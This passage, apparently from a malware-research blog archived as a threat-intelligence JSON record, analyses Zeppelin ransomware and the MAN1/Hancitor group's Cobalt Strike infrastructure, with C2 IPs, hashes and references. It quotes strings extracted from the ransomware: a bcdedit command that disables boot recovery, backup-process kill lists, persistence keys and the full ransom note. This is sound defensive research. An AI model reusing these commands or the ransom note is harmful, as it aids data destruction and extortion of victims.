strings:\r\nSoftware\\Zeppelin\\Process\r\nSoftware\\Zeppelin\\Process\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Run\\\r\nSoftware\\Zeppelin\r\n\u003c/div\u003e\r\nNtQuerySystemInformation\r\nNtQuerySystemInformation\r\n\u003c/N\u003e\u003cD\u003e\r\n1767974731E6E223476E65712463554E87F55542B120AB1CE64651031B43D6AF4DECB1CF8ED6E71FED2376C3169F7A33AC239\r\n1767974731E6E223476E65712463554E87F55542B120AB1CE64651031B43D6AF4DECB1CF8ED6E71FED2376C3169F7A33AC239\r\n{15F7DAB8-8C18-A41B-BFCD-C970AE422622}\r\nbcdedit /set {default} bootstatuspolicy ignoreallfailures;bcdedit /set {default} recoveryenabled no;w\r\n\u003c/N\u003e\u003cD\u003e\r\nboot.ini;bootfont.bin;bootsect.bak;desktop.ini;iconcache.db;ntdetect.com;ntldr;ntuser.dat;ntuser.dat\r\n:\\$Windows.~bt\\;:\\System Volume Information\\;:\\Windows.old\\;:\\Windows\\;:\\intel\\;:\\nvidia\\;:\\inetpub\\l\r\nQueryFullProcessImageNameW\r\nVeeam.Backup.Manager.exe;Veeam.Backup.Agent.ConfigurationService.exe;Veeam.Backup.BrokerService.exe;V\r\n.bat;.cmd;.com;.cpl;.dll;.msc;.msp;.pif;.scr;.sys;.log;.lnk;.zeppelin;\r\nhttps://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618\r\nPage 17 of 20\n\n!!! 
ALL YOUR FILES ARE ENCRYPTED !!!.TXT\r\n!!! ALL YOUR FILES ARE ENCRYPTED !!!\r\nAll your files, documents, photos, databases and other important files are encrypted.\r\n!!! YOUR FILES ARE ENCRYPTED !!!\r\nAll your files, documents, photos, databases and other important\r\nfiles are encrypted.\r\nYou are not able to decrypt it by yourself! There is only one method\r\nof recovering files it is purchase an unique private key.\r\nWrite to angry_war@protonmail.ch\r\nYour personal ID: \u003c!--ID--\u003e\r\nAttention!\r\n * Do not rename encrypted files.\r\n * Do not try to decrypt your data using third party software, it may cause permanent data loss.\r\nWe can continue pivoting on some of the CobaltStrike C2 servers, their admin ports are 43890 instead of the\r\ndefault 50050 and the cert is static:\r\ns:C = US, ST = Washington, L = Redmond, O = Microsoft Corporation, OU = Microsoft Corporation, CN = O\r\nI wrote up a tool for cert scanning ranges a number of years ago for a local conference and we can use it here to\r\nscan entire ranges looking for this actors infrastructure.\r\n4a08189c6f97c3b9a424f1f18c5c4356beaf1b3e\r\nIP: 31.44.184.181 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporati\r\nIP: 31.44.184.165 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporati\r\nIP: 31.44.184.84 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.100 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporati\r\nIP: 31.44.184.74 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.82 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.174 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporati\r\nIP: 31.44.184.56 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft 
Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.73 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nIP: 31.44.184.63 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corporatio\r\nAnother range:\r\n4a08189c6f97c3b9a424f1f18c5c4356beaf1b3e\r\nIP: 185.153.199.162 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corpora\r\nIP: 185.153.199.161 - Empty733716db5a44d79a1a2881109f62060079b5b7a0\r\nIP: 185.153.199.167 - Empty21338c5fec99e8df6573b169fbb2f388b84f82ef\r\nIP: 185.153.199.165 - Empty4a08189c6f97c3b9a424f1f18c5c4356beaf1b3e\r\nIP: 185.153.199.163 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corpora\r\nIP: 185.153.199.166 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corpora\r\nIP: 185.153.199.164 - \u003cName(C=US,ST=Washington,L=Redmond,O=Microsoft Corporation,OU=Microsoft Corpora\r\nThe ‘Empty’ ones are the default CS admin certificate:\r\nsubject=C = Earth, ST = Cyberspace, L = Somewhere, O = cobaltstrike, OU = AdvancedPenTesting, CN = Ma\r\nPivoting further on one of the CS servers, ‘31.44.184.63’ has an interesting file associated with it on VirusTotal.\r\nfe7d4cb5112f5ae0a3d0f9593e1954c60f771f14cc161acd9bdf2f91f2d3267a\r\nThis file is a packed sample of the Send-Safe spam bot.\r\n{'C2': '31.44.184.63:50001/50002', 'CONF': '31.44.184.63:50001/50002;Enterprise Mailing Service'}\r\nThe Send-Safe spammer is also a known utility used by this threat group.\r\nIOCs\r\nCS Related 
Hashes:\r\n655346f41c456cefd9d40c1b9484f1c0dfa36d180c72dd2d1ada26661be1ca6d\r\n2d038b20eaf05bb8d673542f1dbab6a376abb05bf10d38b04f163cfd6c2a7252\r\ne2f686f17b73398d949998e46c7fde48d0507b324a811df39cdd91531deb3d89\r\nd08131d236658401c8de489596ee83992058f05176cbd8b72add89fcea57e37c\r\nbd3c278309e4fe19f7b424ee0b56a1a2c0bbae3a59882d5b6f171d3ca89f728b\r\nIPs:\r\n31.44.184.181\r\n31.44.184.165\r\n31.44.184.84\r\n31.44.184.100\r\n31.44.184.74\r\n31.44.184.82\r\n31.44.184.174\r\n31.44.184.56\r\n31.44.184.73\r\n31.44.184.63\r\n185.153.199.162\r\n185.153.199.161\r\n185.153.199.167\r\n185.153.199.165\r\n185.153.199.163\r\n185.153.199.166\r\n185.153.199.164\r\nReferences\r\nhttps://vixra.org/abs/1902.0257\r\nhttps://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf\r\nhttps://www.proofpoint.com/sites/default/files/pfpt-us-tr-q117-threat-report.pdf\r\nhttps://isc.sans.edu/forums/diary/Hancitor+infection+with+Pony+Evil+Pony+Ursnif+and+Cobalt+Strike/25532/\r\nhttps://app.any.run/tasks/5d21ab13-70fb-4ccf-8a80-545d19c7d20f/\r\nhttps://www.malware-traffic-analysis.net/2020/10/20/index.html\r\nhttps://www.malware-traffic-analysis.net/2020/01/21/index2.html\r\nhttps://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf\r\nSource: https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
	],
	"report_names": [
		"man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "1f6ae238-765f-4495-9d54-6a7883d7a319",
			"created_at": "2022-10-25T16:07:24.573456Z",
			"updated_at": "2026-04-10T02:00:05.037738Z",
			"deleted_at": null,
			"main_name": "TA511",
			"aliases": [
				"MAN1",
				"Moskalvzapoe"
			],
			"source_name": "ETDA:TA511",
			"tools": [
				"Agentemis",
				"Chanitor",
				"Cobalt Strike",
				"CobaltStrike",
				"Ficker Stealer",
				"Hancitor",
				"NetSupport",
				"NetSupport Manager",
				"NetSupport Manager RAT",
				"NetSupport RAT",
				"NetSupportManager RAT",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "542cf9d0-9c68-428c-aff8-81b6f59dc985",
			"created_at": "2023-02-15T02:01:49.554105Z",
			"updated_at": "2026-04-10T02:00:03.347115Z",
			"deleted_at": null,
			"main_name": "Moskalvzapoe",
			"aliases": [
				"MAN1",
				"TA511"
			],
			"source_name": "MISPGALAXY:Moskalvzapoe",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434496,
	"ts_updated_at": 1775826761,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/147179dfe5390b66c89e93060c3c28ea1fac658b.pdf",
		"text": "https://archive.orkl.eu/147179dfe5390b66c89e93060c3c28ea1fac658b.txt",
		"img": "https://archive.orkl.eu/147179dfe5390b66c89e93060c3c28ea1fac658b.jpg"
	}
}